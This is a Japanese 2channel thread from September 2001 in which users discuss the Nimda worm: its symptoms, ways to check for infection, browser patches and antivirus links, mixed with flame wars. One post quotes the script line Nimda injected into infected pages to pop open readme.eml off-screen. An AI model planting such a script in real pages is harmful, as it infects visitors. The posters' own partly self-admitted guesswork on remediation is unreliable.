対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
→java関連とダウンロードのファイルのダウンロードを不許可。
現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
もしかしたら他のファイルに潜伏するかもしれない。
メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。
410 : :01/09/19 12:15 ID:1L5pANOU
状況報告ver1.01(後編)
感染の有無の確認
1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
2.『mep』で検索した際に『mep????.tmp』がHITする。
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
感染の有無の確認
1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
2.『mep』で検索した際に『mep????.tmp』がHITする。
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
411 :名無しさん:01/09/19 12:17 ID:t5ePDc5w
IE6にしたら、リロードの度にいちいちお気に入り欄も反応するけど。
俺だけ?
俺だけ?
412 : :01/09/19 12:17 ID:.l/vJ77g
今回の件てMSNがハッキングされたってことなの?
413 : :01/09/19 12:18 ID:AhB/VHTI
今、このこと全く知らずに
MSN見てるヤツがいるんだけど、
見てても大丈夫なの?
すげー、嫌いなヤツだから、
話しかけずに、ほっといてるけど。
MSN見てるヤツがいるんだけど、
見てても大丈夫なの?
すげー、嫌いなヤツだから、
話しかけずに、ほっといてるけど。
414 : :01/09/19 12:17 ID:/PP57wRc
今日、ここ見てなかったら確実に感染シテタヨ。
みんな、アリガト。
みんな、アリガト。
415 : :01/09/19 12:18 ID:h8x6dquQ
ADMIN.dllってファイルを各ドライブに作られましたが、私だけ?
416 : :01/09/19 12:17 ID:wpo3neEk
今日、ここ見てなかったら確実に感染シテタヨ。
みんな、アリガト。
みんな、アリガト。
417 : :01/09/19 12:18 ID:qasMGDqo
418 : :01/09/19 12:18 ID:BBJlMU0k
今さっきウィルスの事知ったんですが、スタート→検索で*.emlを検索して
引っかからなければセーフって事ですか?
引っかからなければセーフって事ですか?
419 : :01/09/19 12:18 ID:PUJYPwZU
IE5.5sp2って、なんだかテンポが違うな。
早いのか遅いのかわからんw
早いのか遅いのかわからんw
420 : :01/09/19 12:18 ID:p5f2KD92
421 : :01/09/19 12:18 ID:vt1a9us6
SP2を入れようよしたら7204Kまでいって必ず失敗するんですけど・・・なんで?
422 :オレも:01/09/19 12:19 ID:iOVUc1CA
今日、ここ見てなかったら確実に感染シテタヨ。
みんな、アリガト。
みんな、アリガト。
423 : :01/09/19 12:19 ID:PW.2PJSk
ウイルススキャン、一時間もかかった・・・
424 : :01/09/19 12:20 ID:p0HcAdmo
オンラインスキャンしてたらPC落ちた(ウトゥ
425 : :01/09/19 12:20 ID:p5f2KD92
426 : :01/09/19 12:20 ID:AhB/VHTI
427 : ◆ICHIROZ6 :01/09/19 12:21 ID:qGtwdjDE
IE6に変えたら動きが重くなった気がする
428 : :01/09/19 12:21 ID:spzt.8VY
昨日、ここ見てたら確実に感染タヨ。
みんな、直リンアリガト。
殺すぞ
みんな、直リンアリガト。
殺すぞ
429 : :01/09/19 12:21 ID:iOVUc1CA
そっかメールアドレス知ってる人にはこの事教えてあげたほうがいいんだな
430 : ◆ICHIROZ6 :01/09/19 12:22 ID:qGtwdjDE
431 :390:01/09/19 12:22 ID:McRIbKxw
まえスレ読もうとしたら玉三郎でバビッタよ。
今からじっくり読んでまた来る。
今からじっくり読んでまた来る。
432 : :01/09/19 12:22 ID:KAXVrO3Y
我が社では、普段は玩具扱いのiMacが、一番輝いております!!
433 : :01/09/19 12:22 ID:p5f2KD92
434 : :01/09/19 12:22 ID:BceX/Byw
435 : :01/09/19 12:23 ID:zsQE2Q3w
436 :教えて下さい:01/09/19 12:24 ID:rlSzlXt6
自分はマックなので心配ないそうですが、友人のほとんどはWINなので、至急
この事を教えてあげたいのですが、ここのアドレスを友人達に送ったらいい
のですか?あと309をコピーしてやるとか。全然WINのことわからないので。
この事を教えてあげたいのですが、ここのアドレスを友人達に送ったらいい
のですか?あと309をコピーしてやるとか。全然WINのことわからないので。
437 : :01/09/19 12:23 ID:CoeuKRio
チェーンメールするな〜>>429
438 : :01/09/19 12:24 ID:XDNpbKcY
なんてかMS信者なら
WindowsUpdateを一日一回は拝んでほしい
と思うのは私だけ?
さっきから100回以上変なアクセスがw
WindowsUpdateを一日一回は拝んでほしい
と思うのは私だけ?
さっきから100回以上変なアクセスがw
439 :113:01/09/19 12:24 ID:LNEMDmj.
私も昨日今日、ここ見てなかったら確実に感染シテタヨ。
みんな、アリガト。
コピですまん。
みんな、アリガト。
コピですまん。
440 : :01/09/19 12:24 ID:p5f2KD92
441 : :01/09/19 12:25 ID:LvtXHlho
mep・・・354個・・・
442 :名無しさん:01/09/19 12:25 ID:t5ePDc5w
443 : :01/09/19 12:24 ID:6bKYUMSc
444 :のこ:01/09/19 12:27 ID:yjsoab4s
(断片的な情報を集めたのでまちがってたらごめんなさい。)
その1
●Nimdaについて(coderedとはちがうよーん。)
タイプ Worm
目標 IIS サーバーと Microsoft Outlook.
●感染
IIS web サーバー(自己増殖する)
IIS自身がかってにwormを送出しますので、
特に感染している方に隣接しているネットワークの方は感染の疑いあり。
NTと2000は要注意。
☆やばいサイト
やばいサイトをひらくこうとすると.eml
(outlook expressのemailファイル)ファイルをダウンロード
するかどうかきいてくる。これにワームがくっついてくる。
そのやばやばのREADME.EXEは添付されてても見えませんので。
それからこのファイルサイズは57344です。
☆98、95の方はひとまず安心という話
でも最新のパッチはあてときませう。
●症状
☆MAPIをつかって、README.EXE(ちなみにこれはみえない。)を送出する。
☆ファイルの書き換え。
(addmin.dll、riched20.dll. Riched20.dll,load.exe,
.HTM , .HTML ,レジストリ等)
☆システムのスローダウン
☆cドライブを共有フォルダとしてかってにオープンする。
つづく。
その1
●Nimdaについて(coderedとはちがうよーん。)
タイプ Worm
目標 IIS サーバーと Microsoft Outlook.
●感染
IIS web サーバー(自己増殖する)
IIS自身がかってにwormを送出しますので、
特に感染している方に隣接しているネットワークの方は感染の疑いあり。
NTと2000は要注意。
☆やばいサイト
やばいサイトをひらくこうとすると.eml
(outlook expressのemailファイル)ファイルをダウンロード
するかどうかきいてくる。これにワームがくっついてくる。
そのやばやばのREADME.EXEは添付されてても見えませんので。
それからこのファイルサイズは57344です。
☆98、95の方はひとまず安心という話
でも最新のパッチはあてときませう。
●症状
☆MAPIをつかって、README.EXE(ちなみにこれはみえない。)を送出する。
☆ファイルの書き換え。
(addmin.dll、riched20.dll. Riched20.dll,load.exe,
.HTM , .HTML ,レジストリ等)
☆システムのスローダウン
☆cドライブを共有フォルダとしてかってにオープンする。
つづく。
445 : :01/09/19 12:27 ID:Jv..cQeQ
というかシェアからいったら、
「MS信者逝ってよし!」というより
「君もMac信者にならないか?」じゃないの。
「MS信者逝ってよし!」というより
「君もMac信者にならないか?」じゃないの。
446 : :01/09/19 12:27 ID:6bKYUMSc
447 :のこ:01/09/19 12:28 ID:yjsoab4s
その2
●対処法
まだ感染されてない方。
下記にいってパッチを探し、あてませう。
http://www.microsoft.com/technet/security/bulletin/ms00-078.asp.
すでに感染された方。
下記にいってパッチを探し、あててみてください。
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
●予防
知識のないかたはやばいサイトにアクセスしないでください。
お大事に。。。
(断片的な情報を集めたのでまちがってたらごめんなさい。)
●対処法
まだ感染されてない方。
下記にいってパッチを探し、あてませう。
http://www.microsoft.com/technet/security/bulletin/ms00-078.asp.
すでに感染された方。
下記にいってパッチを探し、あててみてください。
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
●予防
知識のないかたはやばいサイトにアクセスしないでください。
お大事に。。。
(断片的な情報を集めたのでまちがってたらごめんなさい。)
448 : :01/09/19 12:28 ID:AhB/VHTI
SP2に更新したら、
書き込んだあと、板にもどれなくなったんだけど。
書き込んだあと、板にもどれなくなったんだけど。
449 : :01/09/19 12:29 ID:X6YlkZ9U
どなたかマジレス下さい…
心配で心臓痛くなってきた…
心配で心臓痛くなってきた…
452 : :01/09/19 12:30 ID:.xGaQ9lU
MXやってて問題ない?
453 : :01/09/19 12:31 ID:AhB/VHTI
鯖重い。
454 :名無しさん:01/09/19 12:31 ID:t5ePDc5w
455 : :01/09/19 12:32 ID:QzWYZO/c
以前、Macに乗り換えるはずだったんだけど、
G4・CUBEのおかげで今でもWindowsだよ(w
G4・CUBEのおかげで今でもWindowsだよ(w
456 : :01/09/19 12:32 ID:.xGaQ9lU
457 :ド素人:01/09/19 12:32 ID:AGkf8kDY
ここの掲示板読んで上のお知らせ板からアップデートしたけど、
10秒くらいでアップデートしたけどこれでいいの?
アップデートしたことないから、、、。
MSNが感染したってどういうことなの?セキュリティしっかりしてそうなのに。
10秒くらいでアップデートしたけどこれでいいの?
アップデートしたことないから、、、。
MSNが感染したってどういうことなの?セキュリティしっかりしてそうなのに。
458 : :01/09/19 12:32 ID:Y5AkCUiQ
新型ワーム「Nimda」、FBIが米同時多発テロとの関連性を捜査
http://pcweb.mycom.co.jp/news/2001/09/19/52.html
これが本当だとすると
改竄されたページ内で首相の顔に×がついてた日本は危ないかもわからんね
http://pcweb.mycom.co.jp/news/2001/09/19/52.html
これが本当だとすると
改竄されたページ内で首相の顔に×がついてた日本は危ないかもわからんね
459 : :01/09/19 12:32 ID:XL1ZIYFM
460 : :01/09/19 12:33 ID:1L5pANOU
>>418
潜伏期間もあるので『readme.exe』『MEP51B3.TMP.EXE』の検索も
実行して。
あったら削除。
削除したらあとは運を天に任せて『*.eml』が量産されないことを祈るのみ。
潜伏期間もあるので『readme.exe』『MEP51B3.TMP.EXE』の検索も
実行して。
あったら削除。
削除したらあとは運を天に任せて『*.eml』が量産されないことを祈るのみ。
461 : :01/09/19 12:33 ID:XDNpbKcY
462 : :01/09/19 12:33 ID:FMe3OP8w
こんな緊急事態にNetBusでウチのPCに何度もアクセスしてくるアホゥがいる・・・・
463 : :01/09/19 12:33 ID:OxTnBwRI
ううむ、帰ったら家のPC全部チェックせねば。
ネスケ愛用の親は大丈夫だろうが、
ムーソ使用の漏れのPCの方を重点的にチェックしよう。
昨日の夜はろくに回ってないから大丈夫だとは思うが(;´д`)
ネスケ愛用の親は大丈夫だろうが、
ムーソ使用の漏れのPCの方を重点的にチェックしよう。
昨日の夜はろくに回ってないから大丈夫だとは思うが(;´д`)
464 :あ:01/09/19 12:34 ID:rMHoLCL6
IE6なら大丈夫なのか。。。
先日アップしたばっかりだからでよかった。
先日アップしたばっかりだからでよかった。
465 : :01/09/19 12:34 ID:pVWEyKzA
ちッホワイトハウスは感染してねーかw
466 : :01/09/19 12:34 ID:.xGaQ9lU
467 :436:01/09/19 12:34 ID:NCoXZZh6
446さん、すいません。ありがとうございました。早速みんなに
メールします
メールします
468 : :01/09/19 12:34 ID:QNTUCHqw
IE5.00もダメか?
# 昼飯から復帰。
>>391
はいはい、ご苦労さん。
> SPとか、俺にはさっぱりわからん
サービスパック(SP)の意味がわからない時点で初心者だと思うぞ。
どんなOSを使っているか知らないけど、せっかくなのでIEでない
ブラウザを使っているとしてもウイルスチェックをしておいたほうが良いよ。
>>391
はいはい、ご苦労さん。
> SPとか、俺にはさっぱりわからん
サービスパック(SP)の意味がわからない時点で初心者だと思うぞ。
どんなOSを使っているか知らないけど、せっかくなのでIEでない
ブラウザを使っているとしてもウイルスチェックをしておいたほうが良いよ。
470 : :01/09/19 12:34 ID:pytz7IQ.
5.5のSP2って直にダウンできないの?
Windows updateは嫌い。
ってゆ〜か学校でSP2落とせば家で電話代かからないし。
Windows updateは嫌い。
ってゆ〜か学校でSP2落とせば家で電話代かからないし。
471 : :01/09/19 12:36 ID:qpXKNfss
IE5.0です。
昨日の晩、クラックされたどっかの大学のHPをエロサイト対策と
同じ装備で見に行ったんだけど、大丈夫だったよ。
半角板に感謝(藁
昨日の晩、クラックされたどっかの大学のHPをエロサイト対策と
同じ装備で見に行ったんだけど、大丈夫だったよ。
半角板に感謝(藁
472 : :01/09/19 12:36 ID:iOVUc1CA
やっとIE5.5SP2に出来た、ふー
後は何したらいいですか?
試しに感染サイトにいってみようかな?
後は何したらいいですか?
試しに感染サイトにいってみようかな?
473 : :01/09/19 12:35 ID:pytz7IQ.
5.5のSP2って直にダウンできないの?
Windows updateは嫌い。
ってゆ〜か学校でSP2落とせば家で電話代かからないし。
Windows updateは嫌い。
ってゆ〜か学校でSP2落とせば家で電話代かからないし。
474 : :01/09/19 12:36 ID:OxTnBwRI
こうして善意のチェーンメールが広まって更にネットが重くなるのか。
鬱だ。
鬱だ。
475 :ド素人:01/09/19 12:37 ID:AGkf8kDY
476 : :01/09/19 12:37 ID:I2xFE9vM
ダウソしたIEが別の新種ウィルスに感染してねぇだろうな?
477 : :01/09/19 12:38 ID:0Ow18JK2
今回のウィルスは、下手するとメリッサやアイラブユーを超える感染力で、
世界的なネットワークのインフラそのものに甚大な影響を与えかねない。
にも関わらず、朝日も毎日も下らない「陰謀説」を記事にしてるだけで、
具体的な対応策を書かないのは何たることだ。
世界的なネットワークのインフラそのものに甚大な影響を与えかねない。
にも関わらず、朝日も毎日も下らない「陰謀説」を記事にしてるだけで、
具体的な対応策を書かないのは何たることだ。
478 : :01/09/19 12:38 ID:CIjuhvgQ
>ふりっぽの利用者の皆さんへ
>http://help.msn.co.jp/notice.htm
>上記サイトのウイルスが感染している可能性があるため表示を一時停止しております。
ふりっぽさん気が付いたね。
>http://help.msn.co.jp/notice.htm
>上記サイトのウイルスが感染している可能性があるため表示を一時停止しております。
ふりっぽさん気が付いたね。
(´ー`)。oO(どうやって持って帰るんだろう)
480 : :01/09/19 12:38 ID:qqVxz.uA
ねぇねぇ>>370の追加情報はないの!?
せっかく眠いのに朝一で研究室いって対策してきたのに.
これがほんとだったらもうどうにもならんYO!?
わかった,デマなんだな!?そうなんだな!?
もう寝ちゃうYO!?
せっかく眠いのに朝一で研究室いって対策してきたのに.
これがほんとだったらもうどうにもならんYO!?
わかった,デマなんだな!?そうなんだな!?
もう寝ちゃうYO!?
481 :ナナシサン:01/09/19 12:38 ID:ETHVTTR2
>475
ねたすか?
ねたすか?
482 : :01/09/19 12:39 ID:byucTCuc
>>473
IE5.5のSP2をダウンロードだけする方法
http://www.atmarkit.co.jp/fwin2k/win2ktips/075ie55donly/075ie55donly.html
IE5.5のSP2をダウンロードだけする方法
http://www.atmarkit.co.jp/fwin2k/win2ktips/075ie55donly/075ie55donly.html
>>456
アウトルックは検索に引っかからないんですか…
>>451
一応ざっと見てみたんですが、居てもたってもいられなくて。ごめんなさい。
>>460
ありがとうございます。早速検索してみたんですが、両方とも引っかかりませんでした。
マジレスありがとうございました。
アウトルックは検索に引っかからないんですか…
>>451
一応ざっと見てみたんですが、居てもたってもいられなくて。ごめんなさい。
>>460
ありがとうございます。早速検索してみたんですが、両方とも引っかかりませんでした。
マジレスありがとうございました。
485 : :01/09/19 12:40 ID:pVWEyKzA
486 :鉄壁最悪:01/09/19 12:41 ID:H46UXkRs
おいら鉄壁というのを使っているんだが、スキャン途中で落っこちる。
買ったときから色々不満はあったが使えないにも程がある。
ノートンかバスターにしとくんだった。
とりあえずトレンドマイクロのオンラインチェックで感染なしを確認。
サンクス!トレンドマイクロ、
ソースネクストのばかろう。
買ったときから色々不満はあったが使えないにも程がある。
ノートンかバスターにしとくんだった。
とりあえずトレンドマイクロのオンラインチェックで感染なしを確認。
サンクス!トレンドマイクロ、
ソースネクストのばかろう。
487 : :01/09/19 12:42 ID:qasMGDqo
あのー、アタックかけられてるって、どうしてわかるんですか?
それは、WEBサーバーのこと? PCのこと?
それは、WEBサーバーのこと? PCのこと?
488 : :01/09/19 12:42 ID:pVWEyKzA
489 :nanasisan(出しゃばり):01/09/19 12:43 ID:KSWVQD0E
>>475
IEのダウンロードサイトからダウンロードすると、ie5setup.exeとかie6setup.exe
ってのが落ちてくるはずなので、それを実行したかどうかってこと。
実行しないとIEの最新版をインストールしたことにはならないぞ。
IEのダウンロードサイトからダウンロードすると、ie5setup.exeとかie6setup.exe
ってのが落ちてくるはずなので、それを実行したかどうかってこと。
実行しないとIEの最新版をインストールしたことにはならないぞ。
490 :勘違い素人:01/09/19 12:42 ID:6bKYUMSc
JavaScriptを切って、HTMLメールを受信しなければ、大丈夫?
491 : :01/09/19 12:44 ID:Od1RIdHU
モナ板の過去ログ倉庫がみれない・・・(鬱
492 : :01/09/19 12:45 ID:J6gqWM9Q
>>469
かかったかかった。
パッチと言えボケ。バグ修正版なんだからなにがサービスだ。カス。
>どんなOSを使っているか知らないけど、せっかくなのでIEでない
俺はPlamo & Netscape or lynxですが何か?
しかしWin厨にウイルスチェックを薦められるとは。
かかったかかった。
パッチと言えボケ。バグ修正版なんだからなにがサービスだ。カス。
>どんなOSを使っているか知らないけど、せっかくなのでIEでない
俺はPlamo & Netscape or lynxですが何か?
しかしWin厨にウイルスチェックを薦められるとは。
493 :落ち着いて感染チェックしろ!:01/09/19 12:45 ID:byucTCuc
***感染チェック***
1.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
→readme.exe, readme.emlの感染チェック可能
2.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
→readme.exeの感染チェック可能
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
1.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
→readme.exe, readme.emlの感染チェック可能
2.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
→readme.exeの感染チェック可能
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
494 :ド素人:01/09/19 12:45 ID:AGkf8kDY
495 : :01/09/19 12:46 ID:1L5pANOU
496 :nanasisan(出しゃばり):01/09/19 12:46 ID:KSWVQD0E
497 : :01/09/19 12:47 ID:Od1RIdHU
スレ一覧やった・・・
逝ってきます。。。
逝ってきます。。。
498 :名無しさん:01/09/19 12:47 ID:uSVTlsN.
トレンドマイクロ落ちてます。
499 :(´ー`)y-~~:01/09/19 12:48 ID:5Gm8qeQs
間違えて旧スレに書き込んじまった(;´Д`)
再度質問
ttp://www.takara-univ.ac.jp/artist/tyoukoku/sakaguti/index.html
↑のindexの最終行に
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
って書いてあるんだけど、これがヤバイの?
再度質問
ttp://www.takara-univ.ac.jp/artist/tyoukoku/sakaguti/index.html
↑のindexの最終行に
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
って書いてあるんだけど、これがヤバイの?
500 : :01/09/19 12:48 ID:J6gqWM9Q
501 : :01/09/19 12:48 ID:CIjuhvgQ
Service Pack 2 (・・?)
502 : :01/09/19 12:48 ID:qasMGDqo
503 :nanasisan(出しゃばり):01/09/19 12:49 ID:KSWVQD0E
>>492
ほほー、Linuxなんだ。俺はSuSEスレでさんざん書いてた奴だ。
今は倉庫落ちしたかな?
Linux板では "潜伏中" のハンドルで書いてるよん :-)
> パッチと言えボケ
Microsoftが「サービスパック」だと言ってるのでソレをそのまま利用しただけ。
ほほー、Linuxなんだ。俺はSuSEスレでさんざん書いてた奴だ。
今は倉庫落ちしたかな?
Linux板では "潜伏中" のハンドルで書いてるよん :-)
> パッチと言えボケ
Microsoftが「サービスパック」だと言ってるのでソレをそのまま利用しただけ。
504 : :01/09/19 12:50 ID:yMcYQ9GQ
>>492はキティ
505 : :01/09/19 12:50 ID:djrfc4Gs
http://search.fresheye.com/?term=monthly&kw=readme.eml
ちゃんとSP2になって大丈夫かどうか。上で検索したサイトに飛んで
試してみてもいいですか?
ちゃんとSP2になって大丈夫かどうか。上で検索したサイトに飛んで
試してみてもいいですか?
506 : :01/09/19 12:50 ID:1L5pANOU
507 : :01/09/19 12:50 ID:qasMGDqo
>>500
え、WEBのファイアウォールのことじゃなくて、そういう別な
ソフトがあるんだと思ったんですけど、違います?
私は初心者なので、わからないけれど、なんで、あなたは
個人攻撃をここで続けてるんでしょう。うざいです。
え、WEBのファイアウォールのことじゃなくて、そういう別な
ソフトがあるんだと思ったんですけど、違います?
私は初心者なので、わからないけれど、なんで、あなたは
個人攻撃をここで続けてるんでしょう。うざいです。
508 :名無しさん:01/09/19 12:51 ID:70l4IFsk
spってパッチの詰め合わせ=サービスパックでいいんじゃ?ちがうの?
いっこいっこはパッチで。
いっこいっこはパッチで。
510 : :01/09/19 12:51 ID:uiw7kC0I
readme.exe、MEP51B3.TMP.EXEはヒットしなかったけど
*.emlとmepは大量発見。アウト?
*.emlとmepは大量発見。アウト?
511 : :01/09/19 12:51 ID:J6gqWM9Q
512 : :01/09/19 12:52 ID:aDolkrTk
一人粘着房がいる模様
513 : :01/09/19 12:53 ID:djrfc4Gs
514 : :01/09/19 12:53 ID:/Sg0yRdA
>>500 ごめんなさい。ぞねや黒氷をファイアーウォールだと思っていました。
515 : :01/09/19 12:53 ID:Y5AkCUiQ
>>992
犬厨はすっこんでろ
あんたみたいなののせいでUNIX使い全体のイメージが悪くなる
健気に自分のマシンを気にする一般ユーザを煽って何が得られるんだ?
仕事で上司に叱られて怒りにまかせた煽りしてるんだらコーヒーでも飲め
犬厨はすっこんでろ
あんたみたいなののせいでUNIX使い全体のイメージが悪くなる
健気に自分のマシンを気にする一般ユーザを煽って何が得られるんだ?
仕事で上司に叱られて怒りにまかせた煽りしてるんだらコーヒーでも飲め
516 : :01/09/19 12:53 ID:J6gqWM9Q
517 : :01/09/19 12:54 ID:OO3wQbOI
東スポに、アオリ記事がデカデカと…。
518 : :01/09/19 12:54 ID:ZGnsXA6c
519 : :01/09/19 12:54 ID:iD2MBbLE
OutlookExpressで質問です。
ウイルス添付がされているメールが来た場合
添付ファイルを実行させないようにするには
どーすればいいんですか?
ウイルス添付がされているメールが来た場合
添付ファイルを実行させないようにするには
どーすればいいんですか?
520 :参考情報:01/09/19 12:54 ID:byucTCuc
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
Trendmicro社 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
Trendmicro社 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
521 :名無しさん:01/09/19 12:54 ID:t5ePDc5w
テレ朝で放送中!
522 :nanasisan(出しゃばり):01/09/19 12:54 ID:KSWVQD0E
>>500
> ファイアーウオールはソフトウエアじゃねーぞ
妙なところを指摘するなぁ :-)
ファイアーウォールは単にセキュリティ上都合の悪いモノをブロックするため
(それがネットワークレイヤのパケット偽装なのか、それともアプリケーションレイヤの変なhtml(javascript)かは知らないが)
の防御壁(防火壁)なんであって、ソフトウエアである場合もあるし、ハードウエアである場合もある。
> ファイアーウオールはソフトウエアじゃねーぞ
妙なところを指摘するなぁ :-)
ファイアーウォールは単にセキュリティ上都合の悪いモノをブロックするため
(それがネットワークレイヤのパケット偽装なのか、それともアプリケーションレイヤの変なhtml(javascript)かは知らないが)
の防御壁(防火壁)なんであって、ソフトウエアである場合もあるし、ハードウエアである場合もある。
523 : :01/09/19 12:54 ID:pVWEyKzA
524 : :01/09/19 12:54 ID:0C89g52A
東スポは一面大見出し
525 : :01/09/19 12:54 ID:J6gqWM9Q
526 :名無しさん:01/09/19 12:54 ID:t5ePDc5w
ラディンが犯人ってか???
527 : :01/09/19 12:55 ID:djrfc4Gs
529 : :01/09/19 12:56 ID:rydEHM7E
>>J6gqWM9Q
ちょっと痛々しい。
ちょっと痛々しい。
530 : :01/09/19 12:56 ID:J6gqWM9Q
531 : :01/09/19 12:56 ID:j4gg3ouk
IE6.0を導入したらデスクトップ「e」のアイコンの色が
薄くなってしまいましたが、問題ありますか?
薄くなってしまいましたが、問題ありますか?
532 :ナナシサン:01/09/19 12:56 ID:ETHVTTR2
W32NIMDA→ADMIN23W→ADMIN to 3W
だそうな
だそうな
533 : :01/09/19 12:56 ID:N4U8iOCw
534 :あは:01/09/19 12:56 ID:jzKbqutU
夕刊キャッチアップやってるアナが
今回のウイルスの記事で
war をワーと読んでたよ。
今回のウイルスの記事で
war をワーと読んでたよ。
535 :豆:01/09/19 12:56 ID:K7bK1LgQ
とりあえずお祈りします。
536 : :01/09/19 12:57 ID:hsQGmGak
前スレのID:8oVJNRd2 = ID:JlX0ElGE だけど、、
やっとみんなことの重大さに気づいてくれたのだね。。(涙
前スレはみんなに気づいてもらえなかったからなぁ…。
マァヴさん、ありがと。
やっとみんなことの重大さに気づいてくれたのだね。。(涙
前スレはみんなに気づいてもらえなかったからなぁ…。
マァヴさん、ありがと。
537 : :01/09/19 12:57 ID:QzWYZO/c
ルーター厨はファイアーウォールソフトやIDSは必要ないと考えているふしがある(w
538 : :01/09/19 12:57 ID:OO3wQbOI
W32NIMDAを、ADMIN to 3W
と読めるという話なんだけど、
W32NIMDAのW32の部分は、ワクチン会社だよな…。
と読めるという話なんだけど、
W32NIMDAのW32の部分は、ワクチン会社だよな…。
539 : :01/09/19 12:57 ID:qasMGDqo
540 : :01/09/19 12:57 ID:2sUuWuR6
いまIE5.0なんだけどIE6.0やIE5.5SP2にバージョンアップしたら
顔文字ってうまく表示できなくなるんですよね?
顔文字ってうまく表示できなくなるんですよね?
541 : :01/09/19 12:57 ID:ULTmFmXo
ラディンの部下のパソヲタが勝手にワームを配布。
何も知らずにネットアクセスしたラディンのPCが世界中から丸見えに。
「My Picture」に炉画像が満杯というオチが好き
何も知らずにネットアクセスしたラディンのPCが世界中から丸見えに。
「My Picture」に炉画像が満杯というオチが好き
542 : :01/09/19 12:58 ID:zsQE2Q3w
543 : :01/09/19 12:58 ID:iOVUc1CA
>524
>東スポは一面大見出し
ホントに?
>東スポは一面大見出し
ホントに?
544 : :01/09/19 12:58 ID:J6gqWM9Q
545 : :01/09/19 12:58 ID:YLu79Ox2
546 :参考情報:01/09/19 12:59 ID:byucTCuc
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
Trendmicro社 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
日本ネットワークアソシエイツ社 http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
MS社 http://help.msn.co.jp/notice.htm
Trendmicro社 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
日本ネットワークアソシエイツ社 http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
MS社 http://help.msn.co.jp/notice.htm
547 : :01/09/19 12:59 ID:/Sg0yRdA
東スポは飛ばしてるなあ・・・
>>511
Win -> Linuxじゃなくて、
OSの無い時代 -> 一時的にMS-DOS -> 386BSD -> FreeBSD -> Linux0.1 -> Windowsにも進出
なんだけどね。まーいいや。
>>514
いちおうそれで認識は合っているよ。
Win -> Linuxじゃなくて、
OSの無い時代 -> 一時的にMS-DOS -> 386BSD -> FreeBSD -> Linux0.1 -> Windowsにも進出
なんだけどね。まーいいや。
>>514
いちおうそれで認識は合っているよ。
549 : :01/09/19 12:59 ID:pVWEyKzA
550 : :01/09/19 13:00 ID:/5kmeCaQ
態度の大きさは、経験に反比例する。
551 : :01/09/19 13:00 ID:jDmQpsF2
粘着なんて無視しようよ。
552 : :01/09/19 13:00 ID:qasMGDqo
553 : :01/09/19 13:01 ID:P2TGn6e6
554 : :01/09/19 13:00 ID:J6gqWM9Q
555 : :01/09/19 13:01 ID:RExNvnKU
今日初めて2チャン来たら
なんじゃこりゃーーーー!!!
怖くてどこのサイトもみれねーよ
回線切ろう
なんじゃこりゃーーーー!!!
怖くてどこのサイトもみれねーよ
回線切ろう
556 :ナナシサン:01/09/19 13:01 ID:ETHVTTR2
>548
スゲー
スゲー
557 : :01/09/19 13:02 ID:ehK3v1x6
http://www.msn.co.jp
現在は??
現在は??
558 : :01/09/19 13:02 ID:Y5AkCUiQ
559 : :01/09/19 13:02 ID:iOVUc1CA
もはや信じれるのは2chだけ
560 :天王寺動物園 飼育部担当:01/09/19 13:02 ID:aDolkrTk
◆このスレッドをご覧の皆様へお知らせとお願い◆
----------------------------------------------
先程から当スレッドでチンパンジーの>511 ID:J6gqWM9Q
が暴れておりますが、観賞用ですので
決してレスしないでご鑑賞ください。
----------------------------------------------
よろしくお願いします。
----------------------------------------------
先程から当スレッドでチンパンジーの>511 ID:J6gqWM9Q
が暴れておりますが、観賞用ですので
決してレスしないでご鑑賞ください。
----------------------------------------------
よろしくお願いします。
561 : :01/09/19 13:02 ID:czWe7QYA
>>370
会社のPCがたくさんやられた。
みんながみんなMSNとかを回って感染したとは考えられん。
シマンテックの解説でも
「ワームはオープンなネットワーク共有を探し、自分自身をコピーします。」
と書いてあるけどLANで繋がってるだけでヤヴァイって事?
